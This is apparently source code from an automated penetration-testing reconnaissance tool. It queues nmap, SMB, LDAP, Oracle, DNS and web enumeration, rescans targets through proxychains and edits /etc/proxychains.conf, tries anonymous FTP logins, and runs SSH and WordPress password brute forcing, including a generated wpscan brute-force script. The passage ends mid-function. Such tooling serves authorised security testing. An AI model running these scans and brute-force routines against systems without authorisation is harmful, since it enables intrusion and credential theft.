def proxyScan(self):
    """Enumerate HTTP services reachable through a discovered web proxy.

    Called by lib/enumProxy.py. Builds (but does not execute) whatweb,
    dirsearch and nikto command lines for every HTTP port visible through
    each proxy port and stores them in ``self.proxy_processes``.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    npp = nmapParser.NmapParserFunk(self.target)
    npp.openProxyPorts()
    proxy_http_ports = npp.proxy_http_ports
    proxy_ports = np.proxy_ports
    # Nothing to do when no HTTP ports are visible through the proxy;
    # self.proxy_processes is left unset, exactly as before.
    if not proxy_http_ports:
        return
    c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    # Ensure report directories exist before queueing commands.
    if not os.path.exists(c.getPath("proxy", "proxyDir")):
        os.makedirs(c.getPath("proxy", "proxyDir"))
    if not os.path.exists(c.getPath("proxy", "proxyWeb")):
        os.makedirs(c.getPath("proxy", "proxyWeb"))
    proxy_commands = []
    for proxy in proxy_ports:
        print(f"""{fg.li_cyan} Enumerating HTTP Ports Through Port: {proxy}, Running the following commands: {fg.rs}""")
        proxy_commands.append(c.getCmd("proxy", "whatwebProxyServer", proxy=proxy))
        # FIX: dropped the redundant inner `if len(proxy_http_ports) != 0`
        # re-check — non-emptiness is already guaranteed by the guard above.
        for proxy_http_port in proxy_http_ports:
            proxy_commands.append(c.getCmd("proxy", "whatwebProxyHttpPorts", proxy=proxy, httpProxy=proxy_http_port))
            proxy_commands.append(c.getCmd("proxy", "dirsearchHttpProxyPortsDict", proxy=proxy, httpProxy=proxy_http_port))
            proxy_commands.append(c.getCmd("proxy", "niktoProxyHttpPort", proxy=proxy, httpProxy=proxy_http_port))
    self.proxy_processes = tuple(proxy_commands)
def Scan(self):
    """Create Aquatone Report based off of the dirsearch results.
    If the length of urls.txt is greater than 150, aquatone won't be run
    as this might be an indication of too many false positives.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    npp = nmapParser.NmapParserFunk(self.target)
    npp.openProxyPorts()
    c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    cmd_info = "[" + fg.li_green + "+" + fg.rs + "]"
    # Gather every web-facing port, direct and proxied, into comma-separated
    # strings for the aquatone command templates.
    ssl_ports = np.ssl_ports
    http_ports = np.http_ports
    proxy_http_ports = npp.proxy_http_ports
    proxy_ssl_ports = npp.proxy_ssl_ports
    proxy_ports = np.proxy_ports
    all_web_ports = []
    all_web_proxy_ports = []
    for x in ssl_ports:
        all_web_ports.append(x)
    for x in http_ports:
        all_web_ports.append(x)
    for x in proxy_http_ports:
        all_web_proxy_ports.append(x)
    for x in proxy_ssl_ports:
        all_web_proxy_ports.append(x)
    all_web_ports_comma_list = ",".join(map(str, all_web_ports))
    all_web_proxy_ports_comma_list = ",".join(map(str, all_web_proxy_ports))
    if not os.path.exists(c.getPath("web", "aquatoneDir")):
        os.makedirs(c.getPath("web", "aquatoneDir"))
    if os.path.exists(c.getPath("web", "aquatoneDirUrls")):
        # Count discovered URLs via `wc -l`; aquatone only runs when the
        # list is non-empty and under the 150-URL false-positive threshold.
        check_lines = f"""wc -l {c.getPath("web","aquatoneDirUrls")} | cut -d ' ' -f 1"""
        num_urls = check_output(check_lines, stderr=STDOUT, shell=True).rstrip()
        # ToDo: open urls.txt and sort urls by occurance of response codes.
        if int(num_urls) < 150 and (int(num_urls) != 0):
            aquatone_cmd = c.getCmd("web", "aquatone", allWebPorts=all_web_ports_comma_list)
            print(cmd_info, aquatone_cmd)
            call(aquatone_cmd, shell=True)
            # Open the HTML report in firefox when available.
            if not which("firefox"):
                pass
            else:
                if os.path.exists(c.getPath("web", "aquatoneReport")):
                    print(f"""{fg.cyan}Opening Aquatone Report {fg.rs}""")
                    open_in_ff_cmd = f"""firefox {c.getPath("web","aquatoneReport")} &"""
                    call(open_in_ff_cmd, shell=True)
    if os.path.exists(c.getPath("proxy", "aquatoneDirProxyUrls")):
        check_lines = f"""wc -l {c.getPath("proxy","aquatoneDirProxyUrls")} | cut -d ' ' -f 1"""
        num_urls = check_output(check_lines, stderr=STDOUT, shell=True).rstrip()
        if int(num_urls) < 150 and (int(num_urls) != 0):
            # NOTE(review): proxy_ports[0] would raise IndexError if no proxy
            # port was parsed — presumably proxy URLs only exist when one was
            # found; confirm against the callers.
            aquatone_cmd = c.getCmd("proxy", "aquatoneProxy", allWebProxyPorts=all_web_proxy_ports_comma_list, proxyPorts=proxy_ports[0])
            print(cmd_info, aquatone_cmd)
            call(aquatone_cmd, shell=True)
            if not which("firefox"):
                pass
            else:
                if os.path.exists(c.getPath("proxy", "aquatoneProxyReport")):
                    open_in_ff_proxy_cmd = f"""firefox {c.getPath("proxy", "aquatoneProxyReport")} &"""
                    call(open_in_ff_proxy_cmd, shell=True)
def Scan(self):
    """Queue Oracle enumeration commands.

    When an Oracle TNS port is open, builds nmap, tnscmd10g, oscanner and
    ODAT command lines (looking for valid SIDs and other useful info) and
    stores them in ``self.processes`` for later execution.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    if not np.oracle_tns_ports:
        return
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    oracle_dir = c.getPath("oracle", "oracleDir")
    if not os.path.exists(oracle_dir):
        os.makedirs(oracle_dir)
    print(fg.cyan + "Enumerating ORACLE, Running the following commands:" + fg.rs)
    queued = [c.getCmd("oracle", "nmapOracle")]
    # tnscmd10g ping/version probes, then oscanner, then ODAT probes —
    # same order as before.
    for mode in ("ping", "version"):
        queued.append(c.getCmd("oracle", "tnscmd10g", mode=mode))
    queued.append(c.getCmd("oracle", "oscanner"))
    for mode in ("ping", "version", "status"):
        queued.append(c.getCmd("oracle", "odatTNS", mode=mode))
    self.processes = tuple(queued)
def SshSingleUserBrute(self):
    """Run patator with seclists probable top 1575 wordlist against a single
    user specified as a command line argument."""
    cmd_info = "[" + fg.green + "+" + fg.rs + "]"
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    cl = helper_lists.Cewl(self.target)
    # Generate a cewl-based wordlist from the target's web content if one
    # doesn't exist yet.
    if not os.path.exists(c.getPath("wordlists", "CewlPlus")):
        cl.CewlWordlist()
    green = fg.li_green
    teal = fg.li_cyan
    reset = fg.rs
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    if os.path.exists(c.getPath("wordlists", "CewlPlus")):
        if os.path.getsize(c.getPath("wordlists", "CewlPlus")) > 0:
            # Non-empty cewl wordlist available: brute force with it.
            print(
                f"""{teal}Beginning Password Brute Force for User: {reset} {green}{self.user}{reset}"""
            )
            patator_cmd = c.getCmd("ssh", "patator_ssh_cewl_auto", port=self.port, user=self.user)
            print(f"""{cmd_info} {patator_cmd}""")
            call(patator_cmd, shell=True)
    else:
        # No cewl wordlist: fall back to the default probable-passwords list.
        # NOTE(review): when the cewl file exists but is empty, neither branch
        # runs — confirm that is intentional.
        print(
            f"""{teal}Beginning Password Brute Force for User: {reset} {green}{self.user}{reset}"""
        )
        patator_cmd = c.getCmd("ssh", "patator_ssh_auto", port=self.port, user=self.user)
        print(f"""{cmd_info} {patator_cmd}""")
        call(patator_cmd, shell=True)
def Scan(self):
    """Queue NetBIOS / SMB / Samba enumeration commands.

    When SMB ports are open, builds smbclient, nmblookup, nmap smb-script,
    nbtscan, smbmap (authenticated/null, recursive variants) and enum4linux
    command lines and stores them in ``self.processes``.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    if not np.smb_ports:
        return
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    smb_dir = c.getPath("smb", "smbDir")
    if not os.path.exists(smb_dir):
        os.makedirs(smb_dir)
    print(
        fg.cyan + "Enumerating NetBios SMB Samba Ports, Running the following commands:" + fg.rs)
    # One config key per tool, queued in the original order.
    tool_keys = (
        "smbclient",
        "nmblookup",
        "nmapSmb",
        "nbtscan",
        "smbmapH",
        "smbmapHR",
        "smbmapNull",
        "smbmapNullR",
        "enum4linux",
    )
    self.processes = tuple(c.getCmd("smb", key) for key in tool_keys)
def proxyEnum(self):
    """Drive proxy enumeration: run the CheckProxy scan, parse the proxied
    ports, gather the enumeration commands and execute them in parallel."""
    proxy_scanner = enumProxy.CheckProxy(self.target)
    proxy_scanner.Scan()
    parser = nmapParser.NmapParserFunk(self.target)
    parser.openProxyPorts()
    proxy_scanner.Enum()
    self.mpRun(proxy_scanner.all_processes)
def Scan(self):
    """If there is an open http-proxy port from nmaps results. Try to add the
    server IP to your proxychains config file and then proceed to scan the
    target again through the proxy port using proxychains and nmap. If more
    ports are discovered open, proceed to enumerate all found open ports
    through the http-proxy port."""
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    proxyPorts = np.proxy_ports
    hpl = helper_lists.topPortsToScan()
    topTCP = hpl.topTCP
    topTcpPortsString = ",".join(map(str, topTCP))
    cmd_info = "[" + fg.li_green + "+" + fg.rs + "]"
    if len(proxyPorts) == 0:
        pass
    else:
        c = config_parser.CommandParser(
            f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
        duplicate_cmds = []
        # sed: append "http <target> <proxy-port>" as the last line of the
        # proxychains config ($a = append after last line).
        add_line_cmd = rf"""sed -e "\$ahttp {self.target} {proxyPorts[0]}" -i /etc/proxychains.conf"""
        # sed: comment out any active socks5 entry (e.g. the default tor line)
        # so the http proxy entry takes effect.
        comment_out_line_cmd = (
            f"""sed -e '/socks5/ s/^#*/#/' -i /etc/proxychains.conf""")
        proxy_config_file = "/etc/proxychains.conf"
        try:
            pcCF = open(proxy_config_file, "r")
            for line in pcCF:
                parsed_lines = line.rstrip()
                # Queue the comment-out command when an uncommented socks5
                # line is present.
                if not parsed_lines.startswith("#"):
                    tor_match = re.findall("socks5", parsed_lines)
                    sorted_tor_matches = sorted(set(tor_match), reverse=True)
                    if "socks5" in sorted_tor_matches:
                        duplicate_cmds.append(comment_out_line_cmd)
                # NOTE(review): this condition is a tautology (always True);
                # the intent appears to be "don't re-add an http entry that
                # already exists for this target".
                if (parsed_lines.startswith("#") or not parsed_lines.startswith('#')):
                    matches = re.findall(f"http {self.target}", parsed_lines)
                    sorted_matches = sorted(set(matches), reverse=True)
                    if f"http {self.target}" not in sorted_matches:
                        duplicate_cmds.append(add_line_cmd)
            pcCF.close()
            # Dedupe the queued sed edits before running them.
            sorted_cmds = sorted(set(duplicate_cmds))
            if len(sorted_cmds) != 0:
                for cmd in sorted_cmds:
                    call(cmd, shell=True)
        except FileNotFoundError as fnf_error:
            # proxychains is not installed / config missing: abort the run.
            print(fnf_error)
            exit()
        if not os.path.exists(c.getPath("proxy", "proxyDir")):
            os.makedirs(c.getPath("proxy", "proxyDir"))
        # Rescan the top TCP ports through the proxy.
        proxychains_nmap_top_ports_cmd = c.getCmd(
            "proxy", "proxychainsNmapTopPorts", topTcpPorts=topTcpPortsString)
        print(cmd_info, proxychains_nmap_top_ports_cmd)
        call(proxychains_nmap_top_ports_cmd, shell=True)
def sslProxyScan(self):
    """Enumerate HTTPS/SSL web servers reachable through a discovered proxy.

    Called by lib/enumProxy.py. Queues whatweb, dirsearch and nikto command
    lines for every SSL port visible through each proxy port and stores them
    in ``self.proxy_processes``.
    """
    npp = nmapParser.NmapParserFunk(self.target)
    npp.openProxyPorts()
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    proxy_ssl_ports = npp.proxy_ssl_ports
    proxy_ports = np.proxy_ports
    if len(proxy_ssl_ports) == 0:
        pass
    else:
        c = config_parser.CommandParser(
            f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
        if not os.path.exists(c.getPath("proxy", "proxyDir")):
            os.makedirs(c.getPath("proxy", "proxyDir"))
        if not os.path.exists(c.getPath("proxy", "proxyWebSSL")):
            os.makedirs(c.getPath("proxy", "proxyWebSSL"))
        proxy_commands = []
        for proxy in proxy_ports:
            print(
                f"""{fg.li_cyan} Enumerating HTTPS Ports Through {proxy}, Running the following commands: {fg.rs}"""
            )
            for proxy_ssl_port in proxy_ssl_ports:
                proxy_commands.append(
                    c.getCmd("proxySSL", "whatwebSSLProxy", proxy=proxy, proxySSLPort=proxy_ssl_port))
                # BUG FIX: the dirsearch command previously received the whole
                # proxy_ports LIST as proxySslPort and the SSL port as proxy;
                # the nikto command had its two values swapped. Both now
                # mirror the whatweb call: the proxy port goes to proxy=...,
                # the SSL port to the SSL-port argument.
                proxy_commands.append(
                    c.getCmd("proxySSL", "dirsearchProxySSLDict", proxy=proxy, proxySslPort=proxy_ssl_port))
                proxy_commands.append(
                    c.getCmd("proxySSL", "niktoProxySSL", proxy=proxy, proxySSLPort=proxy_ssl_port))
        self.proxy_processes = tuple(proxy_commands)
def OraclePwn(self):
    """Brute-force Oracle via the helper lib/oracle.sh bash script when the
    Scan() results exposed an Oracle TNS port (the script attempts to use
    any valid SIDs that were found)."""
    parser = nmapParser.NmapParserFunk(self.target)
    parser.openPorts()
    if not parser.oracle_tns_ports:
        return
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    oracle_pwn = f"""bash {c.getPath("oracle","oracleBrute")} {self.target}"""
    call(oracle_pwn, shell=True)
def ScanWebOption(self):
    """Enumerate Web Server ports based on nmaps output. This function will
    run the following tools; WhatWeb, WafW00f, Dirsearch, Nikto, and curl
    robots.txt This is almost identical to the normal web scan except it
    uses much larger wordlists
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    http_ports = np.http_ports
    dn = domainFinder.DomainFinder(self.target)
    dn.getRedirect()
    hostnames = dn.redirect_hostname
    if len(http_ports) == 0:
        pass
    else:
        reset = fg.rs
        print(f"""{fg.li_cyan}Enumerating HTTP Ports, Running the following commands: {reset}""")
        c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
        commands = []
        if not os.path.exists(c.getPath("web", "webDir")):
            os.makedirs(c.getPath("web", "webDir"))
        if not os.path.exists(c.getPath("web", "aquatoneDir")):
            os.makedirs(c.getPath("web", "aquatoneDir"))
        if hostnames:
            # Redirect hostnames were discovered: enumerate every unique
            # vhost on every HTTP port with the large dirsearch wordlists.
            sorted_hostnames = sorted(set(hostnames))
            for hostname in sorted_hostnames:
                for port in http_ports:
                    commands.append(c.getCmd("web", "whatwebHttpHost", host=hostname, port=port))
                    # commands.append(c.getCmd("web", "eyewitnessHost", host=hostname, port=port))
                    # commands.append(c.getCmd("web", "wafw00fHost", host=hostname, port=port))
                    # commands.append(c.getCmd("web", "curlRobotsHost", host=hostname, port=port))
                    commands.append(c.getCmd("web", "dirsearchHttpHostDListMed", host=hostname, port=port, url=self.web))
                    commands.append(c.getCmd("web", "dirsearchHttpHostRaftLargeFiles", host=hostname, port=port, url=self.web))
                    commands.append(c.getCmd("web", "dirsearchHttpHostRaftLargeDirs", host=hostname, port=port, url=self.web))
                    commands.append(c.getCmd("web", "dirsearchHttpHostForeign", host=hostname, port=port, url=self.web))
                    # commands.append(c.getCmd("web", "niktoHost", host=hostname, port=port))
        else:
            # No hostnames: enumerate the bare target IP on each HTTP port.
            for port in http_ports:
                commands.append(c.getCmd("web", "whatwebHttpTarget", port=port))
                # commands.append(c.getCmd("web", "eyewitnessTarget", port=port))
                # commands.append(c.getCmd("web", "wafw00fTarget", port=port))
                # commands.append(c.getCmd("web", "curlRobotsTarget", port=port))
                commands.append(c.getCmd("web", "dirsearchHttpTargetDListMed", port=port, url=self.web))
                commands.append(c.getCmd("web", "dirsearchHttpTargetRaftLargeFiles", port=port, url=self.web))
                commands.append(c.getCmd("web", "dirsearchHttpTargetRaftLargeDirs", port=port, url=self.web))
                commands.append(c.getCmd("web", "dirsearchHttpTargetForeign", port=port, url=self.web))
                # commands.append(c.getCmd("web", "niktoHost", port=port))
        self.processes = tuple(commands)
def topUdpAllTcp(self):
    """Queue a full nmap TCP port scan together with a scan of the top UDP
    ports, storing both command lines in ``self.processes``."""
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    hpl = helper_lists.topPortsToScan()
    udp_csv = ",".join(map(str, hpl.topUDP))
    self.processes = (
        c.getCmd("nmap", "nmapFullTcpScan"),
        c.getCmd("nmap", "nmapTopUdpScan", topUdpPorts=udp_csv),
    )
def Enum(self):
    """Assemble every enumeration command to run through the proxy based on
    the ports discovered by the original proxychains nmap scan, and store
    them in ``self.all_processes``."""
    npp = nmapParser.NmapParserFunk(self.target)
    npp.openProxyPorts()
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    if not np.proxy_ports:
        return
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    # Gather HTTP and HTTPS enumeration commands prepared by the web scanners.
    pweb = enumWeb.EnumWeb(self.target)
    pweb.proxyScan()
    psslweb = enumWebSSL.EnumWebSSL(self.target)
    psslweb.sslProxyScan()
    # Lead with a proxychains scan of every TCP port seen through the proxy.
    tcp_proxy_ports = ",".join(map(str, npp.proxy_tcp_ports))
    gathered = [c.getCmd("proxy", "proxychainsDiscoveredPorts", openTcpProxyPorts=tcp_proxy_ports)]
    gathered.extend(pweb.proxy_processes)
    gathered.extend(psslweb.proxy_processes)
    # Dedupe and reverse-sort, matching the original ordering.
    self.all_processes = tuple(sorted(set(gathered), reverse=True))
def Scan(self):
    """Queue LDAP enumeration when LDAP ports are open: nmap ldap scripts
    plus enum4linux, whose results feed the ldap.sh bash script."""
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    if not np.ldap_ports:
        return
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    ldap_dir = c.getPath("ldap", "ldapDir")
    if not os.path.exists(ldap_dir):
        os.makedirs(ldap_dir)
    print(fg.cyan + "Enumerating LDAP: Lightweight Directory Access Protocol, Running the following commands:" + fg.rs)
    ldap_csv = ",".join(map(str, np.ldap_ports))
    self.processes = (
        c.getCmd("ldap", "nmapLdap", ldapPorts=ldap_csv),
        c.getCmd("ldap", "enum4linuxLdap"),
    )
def SshMultipleUsersBruteCustom(self):
    """Run patator against multiple users with a custom password wordlist,
    both supplied as command line arguments (self.users / self.passList)."""
    cmd_info = "[" + fg.green + "+" + fg.rs + "]"
    green = fg.li_green
    teal = fg.li_cyan
    reset = fg.rs
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    print(
        f"""{teal}Beginning Password Brute Force for User: {reset} {green}{self.users}{reset}"""
    )
    patator_cmd = c.getCmd("ssh", "patator_ssh_multiple_users_custom", port=self.port, users=self.users, wordlist=self.passList)
    print(f"""{cmd_info} {patator_cmd}""")
    call(patator_cmd, shell=True)
def anonymousLogin(self):
    """Attempt an anonymous FTP login on every discovered FTP port.

    On success, prints the server banner and directory listing and downloads
    everything via self.ftpDownloadAll().

    Returns:
        bool: True if at least one anonymous login succeeded, else False.
        (BUG FIX: the original fell through to ``return False`` even after a
        successful login, so callers could never detect success.)
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.allOpenPorts()
    ftpPorts = np.ftp_ports
    success = False
    for port in ftpPorts:
        ftp = ftplib.FTP()
        try:
            ftp.connect(self.target, port)
            ftp.login('anonymous', '')
            print(ftp.getwelcome())
            ftp.set_pasv(1)
            print(ftp.dir())
            print(ftp.nlst())
            print(f'\n[{fg.li_green}*{fg.rs}] ' + str(self.target) + f'{fg.white} FTP Anonymous Logon Succeeded!{fg.rs}')
            self.ftpDownloadAll(port)
            success = True
        except Exception as e:
            # Broad catch kept deliberately: any socket / FTP error just
            # means this port didn't allow anonymous access.
            print(str(e))
            print(f'\n[{fg.li_red}!{fg.rs}] ' + str(self.target) + ' FTP Anonymous Logon Failed.')
        finally:
            # FIX: the connection was previously never closed (leak).
            try:
                ftp.quit()
            except Exception:
                ftp.close()
    return success
def vulnCheck(self):
    """Vuln Check will check if OpenSSH is vulnerable to Username Enumeration
    (OpenSSH < 7.7). If it is, a suggested manual enumeration command is
    printed to the user. Brute forcing is deliberately not run automatically;
    that choice is left to the user.
    """
    cmd_info = "[" + fg.green + "+" + fg.rs + "]"
    manual_cmd_info = "[" + fg.li_yellow + "+" + fg.rs + "]"
    blue = fg.li_blue
    red = fg.red
    green = fg.li_green
    reset = fg.rs
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    ssh_product = np.ssh_product
    ssh_version = np.ssh_version
    c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    # Check what version OPENSSH is
    # If OpenSSH version is less than 7.7, Enumerate Users
    if len(ssh_product) == 1:
        if ssh_version is not None:
            string_ssh_version = " ".join(map(str, ssh_version))
            if len(string_ssh_version) >= 2:
                lowercase_ssh_version = str(string_ssh_version).lower()
                # FIX: parse the leading major.minor with a regex instead of
                # slicing the first three characters, which mis-parsed
                # two-digit majors (e.g. "10.0" -> "10.") and raised
                # ValueError on non-numeric version banners.
                version_match = re.match(r"(\d+\.\d+)", lowercase_ssh_version)
                if version_match and ssh_product[0] == "OpenSSH":
                    if float(version_match.group(1)) < 7.7:
                        ssh_port = np.ssh_ports
                        print(f"""{cmd_info} {blue}{ssh_product[0]} {ssh_version[0]}{reset} is {red}VULNERABLE to Username Enumeration{reset}""")
                        print(f"""{green}Consider running:{reset}""")
                        print(f"""{manual_cmd_info} {c.getCmd("ssh", "ssh_user_enum", port=ssh_port[0])}""")
                        # sb = brute.Brute(self.target, "ssh", ssh_port)
                        # sb.SshUsersBrute()
                    else:
                        print(f"""{cmd_info} {blue}{ssh_product[0]} {ssh_version[0]}{reset} is {red}NOT{reset} Vulnerable to Username Enumeration""")
def Scan(self):
    """Queue DNS enumeration (dnsenum) for hostnames found by
    lib/domainFinder.py, but only when port 53 is open."""
    print(fg.cyan + "Checking For Virtual Host Routing and DNS" + fg.rs)
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    dns_ports = np.dns_ports
    finder = domainFinder.DomainFinder(self.target)
    finder.Scan()
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    # Accumulate both redirect-derived and FQDN-derived hostnames.
    self.hostnames.extend(finder.redirect_hostname)
    self.hostnames.extend(finder.fqdn_hostname)
    queued = []
    if self.hostnames and dns_ports:
        for directory in (c.getPath("dns", "dnsDir"), c.getPath("web", "aquatoneDir")):
            if not os.path.exists(directory):
                os.makedirs(directory)
        # Reduce each hostname to its base domain (last two labels), dedupe,
        # then queue one dnsenum per unique base domain.
        base_domains = sorted({".".join(host.split('.')[-2:]) for host in self.hostnames})
        queued = [c.getCmd("dns", "dnsenum", hosts=host) for host in base_domains]
    self.processes = tuple(queued)
def CMS(self):
    """If a valid CMS is found from initial Web Enumeration, more
    specifically, WhatWebs results, Then proceed to Enumerate the CMS further
    using Wpscan, Magescan, Nmap, Droopescan, Joomscan, and davtest, hydra,
    and will create a brute force bash script using Cewl, which can then be
    used by WpScan to try and brute force Users and passwords."""
    c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    http_ports = np.http_ports
    dn = domainFinder.DomainFinder(self.target)
    dn.getRedirect()
    hostnames = dn.redirect_hostname
    # Merge vhost names recorded on disk with redirect-discovered hostnames.
    another_array_of_hostnames = []
    if os.path.exists(c.getPath("web", "vhostnames")):
        with open(c.getPath("web", "vhostnames"), "r") as vhfile:
            lines = vhfile.readlines()
            for vh in lines:
                another_array_of_hostnames.append(vh)
    if len(hostnames) != 0:
        for d in hostnames:
            another_array_of_hostnames.append(d)
    cms_commands = []
    if len(http_ports) == 0:
        pass
    else:
        for http_port in http_ports:
            # Locate whatweb report files for this port under the report
            # directory tree (skipping nmap output files).
            whatweb_files = []
            whatweb_hostnames = []
            dir_list = [
                d for d in glob.iglob(c.getPath("report", "reportGlob"), recursive=True) if os.path.isdir(d)
            ]
            for d in dir_list:
                reportFile_list = [
                    fname for fname in glob.iglob(f"""{d}/*""", recursive=True) if os.path.isfile(fname)
                ]
                for rf in reportFile_list:
                    if "nmap" not in rf:
                        if "whatweb" in rf:
                            if str(http_port) in rf:
                                whatweb_files.append(rf)
                                # Remember which known hostnames appear in the
                                # report filename.
                                if len(another_array_of_hostnames) != 0:
                                    for host in another_array_of_hostnames:
                                        if host in rf:
                                            whatweb_hostnames.append(host)
            if len(whatweb_files) != 0:
                for i in whatweb_files:
                    # CMS fingerprints searched for in the whatweb output.
                    cms_strings = [
                        "WordPress",
                        "Magento",
                        "tomcat",
                        "WebDAV",
                        "Microsoft-IIS 6.0",
                        "Drupal",
                        "Joomla",
                        "Webmin",
                    ]
                    try:
                        with open(i, "r") as wwf:
                            for word in wwf:
                                # Strip whatweb's bracket/comma markup before
                                # substring matching.
                                fword = (
                                    word.replace("[", " ")
                                    .replace("]", " ")
                                    .replace(",", " ")
                                )
                                for cms in cms_strings:
                                    if cms in fword:
                                        if len(whatweb_hostnames) != 0:
                                            # Hostname-specific report: queue the host-aware variants.
                                            for hn in whatweb_hostnames:
                                                if hn in i:
                                                    if "WordPress" in cms:
                                                        wpscan_cmd = c.getCmd("web", "wpscanHttpHost", host=hn, httpPort=http_port)
                                                        cms_commands.append(wpscan_cmd)
                                                    if "Drupal" in cms:
                                                        if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                            os.makedirs(c.getPath("vuln", "vulnDir"))
                                                        cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Drupal"))
                                                        cms_commands.append(c.getCmd("web", "droopescanHost", host=hn, httpPort=http_port))
                                                    if "Joomla" in cms:
                                                        if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                            os.makedirs(c.getPath("vuln", "vulnDir"))
                                                        cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Joomla"))
                                                        cms_commands.append(c.getCmd("web", "joomscanHost", host=hn, httpPort=http_port))
                                                        cms_commands.append(c.getCmd("web", "joomlavsHost", host=hn, httpPort=http_port))
                                                    if "Magento" in cms:
                                                        if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                            os.makedirs(c.getPath("vuln", "vulnDir"))
                                                        cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Magento"))
                                                        cms_commands.append(c.getCmd("web", "magescanHost", host=hn, httpPort=http_port))
                                                    if "WebDAV" in cms or ("Microsoft-IIS 6.0" in cms):
                                                        if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                            os.makedirs(c.getPath("vuln", "vulnDir"))
                                                        cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="WebDAV"))
                                                        webdav_cmd = c.getCmd("web", "davtestHost", host=hn)
                                                        webdav_cmd2 = c.getCmd("web", "webDavNmap", httpPort=http_port)
                                                        cms_commands.append(webdav_cmd)
                                                        cms_commands.append(webdav_cmd2)
                                                    if "tomcat" in cms:
                                                        if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                            os.makedirs(c.getPath("vuln", "vulnDir"))
                                                        cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="tomcat"))
                                                        cms_commands.append(c.getCmd("web", "tomcatHydraHost", host=hn, httpPort=http_port))
                                                    if "Webmin" in cms:
                                                        if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                            os.makedirs(c.getPath("vuln", "vulnDir"))
                                                        cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Webmin"))
                                        else:
                                            # No hostname mapping: queue the target-based variants.
                                            if "WordPress" in cms:
                                                wpscan_cmd = c.getCmd("web", "wpscanHttpTarget", httpPort=http_port)
                                                cms_commands.append(wpscan_cmd)
                                                # Generated helper script: if wpscan identified users,
                                                # build a cewl wordlist (plus john rules) and retry
                                                # wpscan brute forcing with progressively larger lists.
                                                manual_brute_force_script = f"""#!/bin/bash

if [[ -n $(grep -i "User(s) Identified" {c.getPath("web","wpscanHttpTarget", httpPort=http_port)}) ]]; then
    grep -w -A 100 "User(s)" {c.getPath("web","wpscanHttpTarget", httpPort=http_port)} | grep -w "[+]" | grep -v "WPVulnDB" | cut -d " " -f 2 | head -n -7 >{c.getPath("web", "wordpressUsers")}
    {c.getCmd("web", "CewlWeb", httpPort=http_port)}
    sleep 10
    echo "Adding John Rules to Cewl Wordlist!"
    {c.getCmd("web", "cewl2John")}
    sleep 3
    # brute force again with wpscan
    {c.getCmd("web", "wpscanCewlBrute", httpPort=http_port)}
    sleep 1
    if grep -i "No Valid Passwords Found" {c.getPath("web", "wpscanCewlBrute")}; then
        if [[ -s {c.getPath("web", "johnCewlWordlist")} ]]; then
            {c.getCmd("web", "wpscanCewlJohnBrute", httpPort=http_port)}
        else
            echo "John wordlist is empty :("
        fi
        sleep 1
        if grep -i "No Valid Passwords Found" {c.getPath("web", "wordpressJohnCewlBrute")}; then
            {c.getCmd("web", "wpscanFastTrackBrute", httpPort=http_port)}
        fi
    fi
fi
"""
                                                try:
                                                    with open(c.getPath("web", "wpscanBashBruteScript"), "w") as wpb:
                                                        print("Creating wordpress Brute Force Script...")
                                                        wpb.write(manual_brute_force_script)
                                                    call(f"""chmod +x {c.getPath("web", "wpscanBashBruteScript")}""", shell=True)
                                                except FileNotFoundError as fnf_error:
                                                    print(fnf_error)
                                            if "Drupal" in cms:
                                                if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                    os.makedirs(c.getPath("vuln", "vulnDir"))
